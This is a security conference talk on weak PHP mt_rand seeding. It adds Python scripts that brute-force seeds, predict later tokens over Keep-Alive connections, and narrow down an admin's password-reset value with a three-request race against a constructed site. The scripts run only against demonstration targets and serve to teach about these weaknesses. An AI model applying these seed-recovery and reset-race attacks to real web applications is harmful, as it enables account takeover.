Cryptography in web applications: vulnerabilities and attacks
21/08/2012, DCG #7812, Saint-Petersburg
by @d0znpp

[d0znpp@localhost ~]# whoami
ONsec company: founder and expert
Fun: security researcher, international speaker, bug hunter, Neuron-hackspace member (neuronspace.ru)
Science: statistical algorithms and machine learning areas
Defcon Russia (DCG #7812)

Introduction
Where do you see crypto in web apps?
- password storage
- one-time passwords
- unique codes
- remember-me tokens
- CSRF tokens
- CAPTCHA
- etc.

Introduction
Everything "unique" is built from random numbers. In practice those numbers are pseudo-random: every value is derived from a seed. The seed is your target: if you know the seed, you know every "random" value. Each process has its own seed, and over a Keep-Alive connection many scripts share that seed. So why would you know the seed value?

Task #1
How do you hack it?
    mt_srand(microtime()*10000);
    mt_srand(getmypid());
    $secret = md5(mt_rand().mt_rand().mt_rand());

Problem #1. Weak seed
The generator is initialised from a seed drawn from a small space: microtime()*10000 gives at most 10^4 distinct seeds, getmypid() at most pid_max (32768 by default on Linux).
    mt_srand(microtime()*10000);
    mt_srand(getmypid());
A brute-force attack over that space restores the seed.

Task #2
How do you hack it?
    mt_srand((double)microtime()*1000000);
    mt_srand(uniqid("",true));
    $secret = md5(mt_rand().mt_rand().mt_rand());

Problem #2. Predictable seed
The generator is initialised from a predictable value:
    mt_srand((double)microtime()*1000000);
Official PHP doc example (http://www.php.net/manual/en/function.mt-srand.php):
    function make_seed() {
        list($usec, $sec) = explode(' ', microtime());
        return (float) $sec + ((float) $usec * 100000);
    }
Both depend only on the current time (and so does uniqid()): the seconds are in the server's Date header, and the sub-second part leaves at most 10^6 candidates for the first form and 10^5 for make_seed().

Problem #3. Keep-Alive glue
Stefan Esser, 2008: http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/
Keep-Alive is your friend. When some information is known about the internal state of the random number generator, Keep-Alive HTTP requests can make exploits very easy. Because follow-up requests during a Keep-Alive HTTP connection are handled by the same process (same random number generator), the state of the random number generator stays the same and random numbers can be precalculated from the outside. While this is always true for mod_php, it is not true for CGI and only sometimes true for FastCGI setups.

Problem #3. Keep-Alive glue
Initialise the generator with a predictable value:
    GET /newcaptha HTTP/1.1
    Connection: Keep-Alive
Then the next random value is predictable:
    GET /recoverpass HTTP/1.1
    Connection: Keep-Alive
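Worked brute force for Tasks #1 and #2, plus the Keep-Alive follow-up of Problem #3, added here as an example; it is not code from the slides. PhpMtRand and first_mt_rand_values are my own port of PHP 5.x mt_srand()/mt_rand() as I remember the C source (including PHP's twist() quirk that reads the low bit from the current state word), so verify it against a real PHP 5 interpreter before trusting a recovered seed; task1_secret, recover_seed, predict_next, php_seed_from_microtime and the timestamp string are constructed for the demonstration.

```python
"""Brute-forcing a weak or predictable mt_srand() seed (Problems #1-#3).

Assumptions: PhpMtRand is a port of PHP 5.x mt_srand()/mt_rand() from memory
(check against a real PHP 5 interpreter). Seed spaces are from the slides:
microtime()*10000 < 10^4, getmypid() <= pid_max (32768 by default on Linux),
(double)microtime()*1000000 < 10^6.
"""
import hashlib

N, M = 624, 397
MASK32 = 0xFFFFFFFF


def _twist(m, u, v):
    # PHP 5.x takes the low bit from u; reference MT19937 takes it from v.
    mixed = (u & 0x80000000) | (v & 0x7FFFFFFF)
    return m ^ (mixed >> 1) ^ (0x9908B0DF if u & 1 else 0)


def _temper(y):
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    return y ^ (y >> 18)


class PhpMtRand:
    """mt_srand(seed) followed by repeated mt_rand() (31-bit outputs)."""

    def __init__(self, seed):
        s = [seed & MASK32]
        for i in range(1, N):
            s.append((1812433253 * (s[i - 1] ^ (s[i - 1] >> 30)) + i) & MASK32)
        self.state = s
        self._reload()

    def _reload(self):
        s = self.state
        for i in range(N - M):
            s[i] = _twist(s[i + M], s[i], s[i + 1])
        for i in range(N - M, N - 1):
            s[i] = _twist(s[i + M - N], s[i], s[i + 1])
        s[N - 1] = _twist(s[M - 1], s[N - 1], s[0])
        self.left = N
        self.next = 0

    def mt_rand(self):
        if self.left == 0:
            self._reload()
        self.left -= 1
        y = self.state[self.next]
        self.next += 1
        return _temper(y) >> 1


def first_mt_rand_values(seed, k):
    """Same as PhpMtRand(seed).mt_rand() k times, but only builds the state words
    those k outputs depend on (k <= N-M); this is what keeps a brute force cheap."""
    assert k <= N - M
    s = [seed & MASK32]
    for i in range(1, M + k):
        s.append((1812433253 * (s[i - 1] ^ (s[i - 1] >> 30)) + i) & MASK32)
    return [_temper(_twist(s[i + M], s[i], s[i + 1])) >> 1 for i in range(k)]


def php_seed_from_microtime(microtime_str, factor):
    """What mt_srand(microtime()*factor) really seeds: PHP keeps the leading
    numeric part of the string ('0.12345600 1345541677' -> 0.123456),
    multiplies, and truncates to an integer."""
    return int(float(microtime_str.split()[0]) * factor)


def task1_secret(seed):
    """$secret = md5(mt_rand().mt_rand().mt_rand()); after mt_srand(seed)."""
    r1, r2, r3 = first_mt_rand_values(seed, 3)
    return hashlib.md5(f"{r1}{r2}{r3}".encode()).hexdigest()


def recover_seed(secret_hex, seed_space):
    """Brute force: first seed in seed_space that reproduces the observed secret."""
    for seed in seed_space:
        if task1_secret(seed) == secret_hex:
            return seed
    return None


def predict_next(seed, already_drawn, count):
    """Keep-Alive follow-up: the values the same process will hand out next."""
    return first_mt_rand_values(seed, already_drawn + count)[already_drawn:]


if __name__ == "__main__":
    seed = php_seed_from_microtime("0.12345600 1345541677", 10000)  # constructed timestamp
    leaked = task1_secret(seed)
    found = recover_seed(leaked, range(10**4))
    print("seed", found, "next mt_rand() values", predict_next(found, 3, 2))
```

Over the 10^4 seeds of microtime()*10000 this finishes in a couple of seconds in plain Python; the 10^6 space of (double)microtime()*1000000 takes minutes, and the full 2^32 space of Problem #5 wants a compiled brute-forcer. predict_next is the Keep-Alive case: once the seed used by /newcaptha is known, whatever /recoverpass draws on the same connection is simply the next entries of the same sequence.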

Task #4
How do you hack it?
    function resetPassword($email) {
        if (userExists($email)) {
            mt_srand((double)microtime()*1000000);
            $new_pass = md5(mt_rand());
            if (sendPassByEmail($email, $new_pass)) {
                updateUserPass($email, $new_pass);
                return true;
            } else return false;
        } else return false;
    }

Problem #4. Race condition
    mt_srand((double)microtime()*1000000)
Q1: change my password
Q2: change the admin's password
Q3: change my password
Date: Tue, 21 Aug 2012 09:34:37
- Locally brute the microseconds of Q1 and Q3
- Determine the interval where Q2 must lie
- Remotely brute the Q2 value

Problem #4. Race condition
1. Request a reset of your own password
2. Request a reset of the admin's password
3. Request a reset of your own password again
4. Parse the "Date" header of each HTTP response
5. Compare the "Date" seconds of the 3 responses (D1, D2, D3): you need D1 = D2 = D3, or at least D1 = D2 with D3 in the next second
6. If the D1, D2, D3 seconds differ, try again

Problem #4. Race condition
- Locally brute the random values R1 and R3 behind the D1 and D3 responses (10^6 candidates for D1; for D3 only the candidates after R1, since R3 > R1)
- Now you know a short interval (R1; R3) that contains R2
- Remotely brute R2 with ~10^3 HTTP requests (not 10^6 any more)
- Breaks down when a balancer/frontend is present (the three requests may be served by different backend processes)
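The race of Problem #4 carried through end to end, as an added example that is not from the slides. Python's random.Random stands in for PHP's mt_srand/mt_rand here (a real attack needs a port of PHP's generator; the narrowing logic is unchanged), and VictimSite, new_pass, brute_usec, attack, the three microsecond values and the Date headers are all constructed for the demonstration.

```python
"""Problem #4: narrowing the admin's reset token with a race.

Assumption: random.Random replaces PHP's mt_rand (same narrowing, different
generator). The target site, microsecond values and Date headers are constructed.
"""
import hashlib
import random
from email.utils import parsedate_to_datetime

USEC_PER_SEC = 10**6   # (double)microtime()*1000000 seeds with the microseconds only


def new_pass(usec):
    """resetPassword()'s token: mt_srand(usec); md5(mt_rand()) -- stand-in PRNG."""
    return hashlib.md5(str(random.Random(usec).getrandbits(31)).encode()).hexdigest()


def same_second(date_headers):
    """Steps 4-6 of the slides: all responses must carry the same Date second."""
    seconds = {parsedate_to_datetime(d).replace(microsecond=0) for d in date_headers}
    return len(seconds) == 1


class VictimSite:
    """Constructed target: Q1 (me), Q2 (admin), Q3 (me) handled at microseconds
    u1 < u2 < u3 of one second. The attacker only ever sees its own two tokens."""

    def __init__(self, u1, u2, u3):
        self.my_tokens = (new_pass(u1), new_pass(u3))
        self._admin_pass = new_pass(u2)
        self.login_attempts = 0

    def admin_login(self, password):
        self.login_attempts += 1
        return password == self._admin_pass


def brute_usec(token, lo, hi):
    """Local brute force of the microsecond seed behind one of our own tokens."""
    for u in range(lo, hi):
        if new_pass(u) == token:
            return u
    return None


def attack(site, space=USEC_PER_SEC):
    """Recover the admin password with ~10^3 remote tries instead of ~10^6."""
    t1, t3 = site.my_tokens
    u1 = brute_usec(t1, 0, space)          # up to `space` local hashes
    if u1 is None:
        return None
    u3 = brute_usec(t3, u1 + 1, space)     # only the rest of the second
    if u3 is None:
        return None
    for u in range(u1 + 1, u3):            # the admin's seed lies strictly between
        candidate = new_pass(u)
        if site.admin_login(candidate):
            return u, candidate
    return None


if __name__ == "__main__":
    dates = ["Tue, 21 Aug 2012 09:34:37 GMT"] * 3      # constructed headers
    site = VictimSite(412_000, 412_850, 413_900)       # constructed microseconds
    if same_second(dates):
        print(attack(site), "remote tries:", site.login_attempts)
```

The local work is bounded by one second of microseconds (10^6 hashes for Q1, the remainder for Q3); the remote work is the width of the interval, which is why the three requests must be fired as close together as possible. Behind a load balancer the three requests can land on different processes, and the interval argument no longer holds.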

Task #5
    function generateMySafetyToken() {
        mt_srand($really_random_value);
        $salt = generateRandomString(8);
        $newpass = generateRandomString(32);
        updateUser($salt.md5($newpass.$reallyLongAndSecretSalt));
    }

    function generateRandomString($l) {
        $chars = "abcdeghijklmnopqrtuvwxz...";
        $r = '';
        for ($i = 0; $i < $l; $i++)
            $r .= $chars[mt_rand(0, strlen($chars)-1)];
        return $r;
    }

Problem #5. Shared randoms
Random values are generated and then exposed in HTTP responses (various unique IDs, such as the $salt above). The seed can be recovered from the exposed values, and with the seed you get every random value the process drew, including the ones that were never shown ($newpass).

Problem #5. Shared randoms
How many random values do you need to recover the seed? mt_getrandmax() = 2^31 - 1.
For the 62-symbol preset (a-z A-Z 0-9):

Leaked random characters    Seeds still consistent
1                           ~3.5*10^7 (~= mt_getrandmax()/62)
2                           ~5.5*10^5
3                           ~9*10^3
4                           ~150
5                           ~4

Problem #5. Shared randoms
Recovering the seed by brute force over all 2^32 values takes about 1.2 hours on my laptop CPUs (i7 1.8 GHz), with one PHP brute-force process per /proc/cpuinfo entry.
Let me know if you want to get the demo scripts ;)
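The table above, reproduced as an experiment: an added example, not the author's demo scripts. Python's random.Random stands in for PHP's mt_rand (the real search needs a port of PHP's generator and covers all 2^32 seeds), php_range is my port of the RAND_RANGE scaling that PHP 5's mt_rand(min, max) applies to a 31-bit raw value, and the 62-symbol alphabet, the 2^16-seed toy space and the leaked string are constructed so the run takes seconds.

```python
"""Problem #5: how many leaked random characters pin down the seed?

Assumptions: random.Random replaces PHP's mt_rand; php_range is a port of
PHP 5's RAND_RANGE; the 62-symbol alphabet and the 2^16 toy seed space are
constructed (the slide's numbers are for the 2^31 output space).
"""
import random
import string

CHARS = string.ascii_lowercase + string.ascii_uppercase + string.digits  # 62 symbols
MT_RAND_MAX = 0x7FFFFFFF  # mt_getrandmax() = 2^31 - 1


def php_range(n, lo, hi):
    """mt_rand(lo, hi) from a 31-bit raw value n: lo + floor((hi-lo+1) * n / 2^31)."""
    return lo + int((hi - lo + 1.0) * (n / (MT_RAND_MAX + 1.0)))


def random_string(seed, length):
    """generateRandomString(length) right after mt_srand(seed), stand-in PRNG."""
    r = random.Random(seed)
    return "".join(CHARS[php_range(r.getrandbits(31), 0, len(CHARS) - 1)]
                   for _ in range(length))


def survivors(observed, seed_space):
    """by_k[k] = seeds in seed_space whose first k characters equal observed[:k].
    One pass over the space; a seed is advanced only while it keeps matching."""
    by_k = {k: [] for k in range(1, len(observed) + 1)}
    for seed in seed_space:
        r = random.Random(seed)
        for k in range(1, len(observed) + 1):
            if CHARS[php_range(r.getrandbits(31), 0, len(CHARS) - 1)] != observed[k - 1]:
                break
            by_k[k].append(seed)
    return by_k


def expected_survivors(space_size, k):
    """Each leaked character keeps about 1/62 of the seeds: the slide's table is
    this estimate for a 2^31 space (mt_getrandmax()/62, /62^2, ...)."""
    return space_size / len(CHARS) ** k


if __name__ == "__main__":
    space = range(2**16)
    leaked = random_string(31337, 5)  # constructed: the $salt seen in a response
    for k, seeds in survivors(leaked, space).items():
        print(k, "chars:", len(seeds), "seeds left, expected ~%.1f"
              % expected_survivors(len(space), k))
```

With a 2^16 toy space one character leaves about a thousand seeds and five leave only the true one, matching the 1/62-per-character estimate; scale the space to 2^31 and you get the slide's column. Once a single seed survives, random_string(seed, 32) of the same generator is the $newpass that was never sent to the client.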

What about hashes?
MD5 brute-force speed is about 11*10^9 hashes/sec on an AMD Radeon HD 6990 (~$800).
Tools: oclHashcat (pro/lite), ighashgpu, John the Ripper, egbruteforcer (InsidePro)

Typical problems
md5($salt.$pass) is really hard to brute-force at the moment. Why? Read http://hashcat.net/forum/thread-1437.html for details.
Wait for the new oclHashcat version (late 2012). Other tools have no md5($salt.$pass) template, and dictionary attacks are really slow (~10^3 h/s).

How much time to brute?
Raw MD5 brute-force speed (modern hardware):
CPU:   ~10^7 hash/sec   150 W
GPU:   ~10^10 hash/sec  500 W
FPGA:  ~10^11 hash/sec  250 W

Thx & questions ???
Stefan Esser (2008) for great research
Mykola Ilin (Defcon UA, Kiev) for answers and practice, theoretical base and more
Neuronspace (hackspace Moscow) for all ;)
Follow me: @d0znpp
d0znpp[special char]ONsec.ru
